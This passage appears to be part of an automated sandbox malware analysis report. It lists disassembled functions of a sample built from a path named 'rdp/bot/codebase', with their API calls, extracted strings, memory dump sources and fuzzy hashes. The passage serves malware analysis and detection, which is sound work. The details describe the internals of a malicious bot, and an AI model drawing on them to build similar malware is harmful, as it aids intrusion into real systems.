                                                                                                                                                  • Instruction Fuzzy Hash: 0C41FFA1B0964791FA20DB58E940BB82270FB38398F944537FB4D8A5A5DF7CE966D300
                                                                                                                                                  Function 00007FF6BE036B40 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                                                                                                  • API String ID: 2918714741-719680006
                                                                                                                                                  • Opcode ID: db69bd356b19582b7b3e077722370c03f868c6cfd7eb9de0e0838f2971b70153
                                                                                                                                                  • Instruction ID: 02628c9848c7515d0d5b5d2ab6077e34099f45d367533987a85496afcb88e7cd
                                                                                                                                                  • Opcode Fuzzy Hash: db69bd356b19582b7b3e077722370c03f868c6cfd7eb9de0e0838f2971b70153
                                                                                                                                                  • Instruction Fuzzy Hash: EE215C61A0864796E721DF59F940BAA37B0BB68784F444036FF4C87655DF3CE8A5CB00
                                                                                                                                                  Function 00007FF6BE03DEBE Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 25libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                  • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                                                                                                                  • API String ID: 384173800-4041758303
                                                                                                                                                  • Opcode ID: 5291cd93b414ba6c424e77f612c9ff6642894636800bc1888b68a92809d904ce
                                                                                                                                                  • Instruction ID: 077664f75aa7db31d659d4b09262ebdfe74c990979fac17f8590c38e0e931f7a
                                                                                                                                                  • Opcode Fuzzy Hash: 5291cd93b414ba6c424e77f612c9ff6642894636800bc1888b68a92809d904ce
                                                                                                                                                  • Instruction Fuzzy Hash: 04F0DA24E0AA1790EE15DB5AFE544B827B4BF78794B840137EA0DD7320EE3CA56AD300
                                                                                                                                                  Function 00007FF6BE037754 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                                                                                                                                  • API String ID: 39653677-2979476222
                                                                                                                                                  • Opcode ID: ded80575854a2ac1c31e98b4d13eabe6bc3d5566ee1ac97b299903925feaac68
                                                                                                                                                  • Instruction ID: 76d582da3ff774e70535047c05890818ec9daa5c6ae435b43f0279a61cc2a6a2
                                                                                                                                                  • Opcode Fuzzy Hash: ded80575854a2ac1c31e98b4d13eabe6bc3d5566ee1ac97b299903925feaac68
                                                                                                                                                  • Instruction Fuzzy Hash: 8C519F51F0958751FA358B1DA910FBA16727F39788F584232FB4E8BAD5DE2CE921C340
                                                                                                                                                  Function 00007FF6BE03A134 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,?,?,00007FF6BE0450F8,00007FF6BE045100,00007FF6BE030000,?,?,00007FF6BE03A348,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE03A1DD
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?,00007FF6BE0450F8,00007FF6BE045100,00007FF6BE030000,?,?,00007FF6BE03A348,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE03A244
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00007FF6BE0450F8,00007FF6BE045100,00007FF6BE030000,?,?,00007FF6BE03A348,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE03A24E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$ErrorLastProtectQuery
                                                                                                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                                  • API String ID: 637304234-2123141913
                                                                                                                                                  • Opcode ID: 6903964d322ee31ad0e95d65d8f33e82ba9bc0ba0f8e816a8c1169f1d38d6b35
                                                                                                                                                  • Instruction ID: 1476ee8b4eab349caf1721fcbd812c2a8b259ba217c014941c57ca1fc2bae78c
                                                                                                                                                  • Opcode Fuzzy Hash: 6903964d322ee31ad0e95d65d8f33e82ba9bc0ba0f8e816a8c1169f1d38d6b35
                                                                                                                                                  • Instruction Fuzzy Hash: 3331A071B09A4285EA248F5DE940A696371FFB9B84F448936FF0D873A8DE3CE565D300
                                                                                                                                                  Function 00007FF6BE03179C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00007FF6BE031694: LoadLibraryA.KERNEL32(?,?,service,000002234F5413D0,00007FF6BE039404), ref: 00007FF6BE0316A2
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF6BE031818
                                                                                                                                                    • Part of subcall function 00007FF6BE031613: GetProcAddress.KERNEL32(?,?,00000000,000002234F5413D0,?,00007FF6BE03941F), ref: 00007FF6BE031633
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastLibraryLoadProc
                                                                                                                                                  • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                                                                                                                                  • API String ID: 3511525774-1584720945
                                                                                                                                                  • Opcode ID: 299e703167dabb65f95b7969ec2bd929e0b5c348b50a9a34504bfdabb7e3df02
                                                                                                                                                  • Instruction ID: 98650692215f2e0971ea7b8459355375e315cfaa7c2066d1ffe2849933591527
                                                                                                                                                  • Opcode Fuzzy Hash: 299e703167dabb65f95b7969ec2bd929e0b5c348b50a9a34504bfdabb7e3df02
                                                                                                                                                  • Instruction Fuzzy Hash: 48115B61E1D60392FB319B5CE9507B42270AF7C384F840433FA0EDA2A1EE2CE965C301
                                                                                                                                                  Function 00007FF6BE031700 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00007FF6BE031694: LoadLibraryA.KERNEL32(?,?,service,000002234F5413D0,00007FF6BE039404), ref: 00007FF6BE0316A2
                                                                                                                                                    • Part of subcall function 00007FF6BE031613: GetProcAddress.KERNEL32(?,?,00000000,000002234F5413D0,?,00007FF6BE03941F), ref: 00007FF6BE031633
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF6BE031760
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                                                                                                                                  • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                                                                                                                                  • API String ID: 1533789296-1853374401
                                                                                                                                                  • Opcode ID: 09afca86ac6373594683831a9800fda29b0d0380933a6dba12c5dd9e95751942
                                                                                                                                                  • Instruction ID: 26f2c50d11ab47e80197e7d57ea837a1d550ca20fd1a66e32a0a7b6cb9b974f8
                                                                                                                                                  • Opcode Fuzzy Hash: 09afca86ac6373594683831a9800fda29b0d0380933a6dba12c5dd9e95751942
                                                                                                                                                  • Instruction Fuzzy Hash: 69011E60E1D90392FB20A71CE9917B426756F7C385F940433F60EC62A1EF2CE565D301
                                                                                                                                                  Function 00007FF6BE0388EE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE03892F
                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE038962
                                                                                                                                                  • HeapFree.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE038973
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap$LibraryProcessfflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(name=%s)$units_cleanup
                                                                                                                                                  • API String ID: 1108967834-2645831314
                                                                                                                                                  • Opcode ID: df822bde4ab91df9b5e11f67eb84a15336e41f6d56ae208c14dde87552ffa11d
                                                                                                                                                  • Instruction ID: be1d927be9eef80314fe3a573a9176bd422fadb0021d29ce6381ee4af2303a01
                                                                                                                                                  • Opcode Fuzzy Hash: df822bde4ab91df9b5e11f67eb84a15336e41f6d56ae208c14dde87552ffa11d
                                                                                                                                                  • Instruction Fuzzy Hash: F1112C61A0D60781FA609F5DE944B7823B1BF7CB44F484472EB4D873A0EE2CE865D321
                                                                                                                                                  Function 00007FF6BE039E39 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • fclose.MSVCRT ref: 00007FF6BE039E53
                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,00007FF6BE0389B9,?,?,00000000,00007FF6BE038CE3,?,?,?,?,?,?,00000001), ref: 00007FF6BE039E80
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalDeleteSectionfclose
                                                                                                                                                  • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                                                                                                                  • API String ID: 3387974148-4247581856
                                                                                                                                                  • Opcode ID: 0b41fed68d09f55e26358beb6b558423a32279b24a0a215fce4a601fd74a5666
                                                                                                                                                  • Instruction ID: 557f8ba41ec1e1f7b1133acbe8c242bab9918f67f4a884283f5315e410539fc5
                                                                                                                                                  • Opcode Fuzzy Hash: 0b41fed68d09f55e26358beb6b558423a32279b24a0a215fce4a601fd74a5666
                                                                                                                                                  • Instruction Fuzzy Hash: 43F0F4A4A0D64B80FA10AB6CEA653752270EFB4754F840937F30C86164CF3CA0699360
                                                                                                                                                  Function 00007FF6BE03A27A Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00007FF6BE0484F8,00000000,?,?,?,00007FF6BE0484F0,00007FF6BE031208,?,?,?,00007FF6BE031313), ref: 00007FF6BE03A4C7
                                                                                                                                                  Strings
                                                                                                                                                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF6BE03A3F0
                                                                                                                                                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6BE03A462
                                                                                                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF6BE03A36D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                  • API String ID: 544645111-1286557213
                                                                                                                                                  • Opcode ID: f376e8e6a081a73d79aaf6fb7616c898084fe598007c7d48d63f28f0360e0926
                                                                                                                                                  • Instruction ID: 1086768f3d51cee392c1a680e5803c1751e67bd7ae73cbd8f35722d347614459
                                                                                                                                                  • Opcode Fuzzy Hash: f376e8e6a081a73d79aaf6fb7616c898084fe598007c7d48d63f28f0360e0926
                                                                                                                                                  • Instruction Fuzzy Hash: AE51AD61F0865295EB308B1DD544A78A3B1EBB8BA4F048536FB1D837D9DE3CE5A1E700
                                                                                                                                                  Function 00007FF6BE031360 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorHandleLastModule
                                                                                                                                                  • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                                                                                                                                  • API String ID: 4242514867-2427012484
                                                                                                                                                  • Opcode ID: a70a8af8a6799b811748485c2465aaf2f97ed70b4a56fe3518cf35e5e755f2da
                                                                                                                                                  • Instruction ID: bee28b518a13a14ef3a7a5e07ca25bd8c30db4eb314379a70d0eaf7fc0b24ae1
                                                                                                                                                  • Opcode Fuzzy Hash: a70a8af8a6799b811748485c2465aaf2f97ed70b4a56fe3518cf35e5e755f2da
                                                                                                                                                  • Instruction Fuzzy Hash: 03F03920A0CA0680E7309B18E8447AA7771FFBC388F840033F74D86AA4EF6CD228C741
                                                                                                                                                  Function 00007FF6BE03E0F0 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Byte$CharMultiWide$Lead_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2766522060-0
                                                                                                                                                  • Opcode ID: e52bfd8392137d51bb9391ae47cf714bbbdc63591f019e6cdc8d20eb038805a4
                                                                                                                                                  • Instruction ID: 74eb331e70a6b2fbbaedfbe19d2c1e0307a7945d1606c5d193d3480fb91bd8b2
                                                                                                                                                  • Opcode Fuzzy Hash: e52bfd8392137d51bb9391ae47cf714bbbdc63591f019e6cdc8d20eb038805a4
                                                                                                                                                  • Instruction Fuzzy Hash: 9531A472A0C38249F7304B299904B796BA0EBB9784F144235FB99877D6DF3CD5568702
                                                                                                                                                  Function 00007FF6BE03A530 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: signal
                                                                                                                                                  • String ID: CCG
                                                                                                                                                  • API String ID: 1946981877-1584390748
                                                                                                                                                  • Opcode ID: 3d48847964a56b40779e632f9fb4250c1fb945e224c615d2d4335e1e0d083621
                                                                                                                                                  • Instruction ID: 64c715b4b66b3dd9f36855e434f09a912d30ed6cc7bd25adc640f73c975be9e2
                                                                                                                                                  • Opcode Fuzzy Hash: 3d48847964a56b40779e632f9fb4250c1fb945e224c615d2d4335e1e0d083621
                                                                                                                                                  • Instruction Fuzzy Hash: 5A217C61E0D10385FE79521D9440B7921A2AF7E364F298B36FB0EC62D1DE5DE8F27211
                                                                                                                                                  Function 00007FF6BE039FE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-3474627141
                                                                                                                                                  • Opcode ID: 6939521f6767264a8fb87927fdf9a759c58c7e4e71ae3242473c69dd497d05cf
                                                                                                                                                  • Instruction ID: 5ba6dea4dc98f427f613d8366246f795e5c58ec16172a3f17284cfa1b6243e12
                                                                                                                                                  • Opcode Fuzzy Hash: 6939521f6767264a8fb87927fdf9a759c58c7e4e71ae3242473c69dd497d05cf
                                                                                                                                                  • Instruction Fuzzy Hash: 4D113366908E8482D6118F1CE4413EAB370FFAE75AF505326FBCC66664DF39D166CB00
                                                                                                                                                  Function 00007FF6BE03A029 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
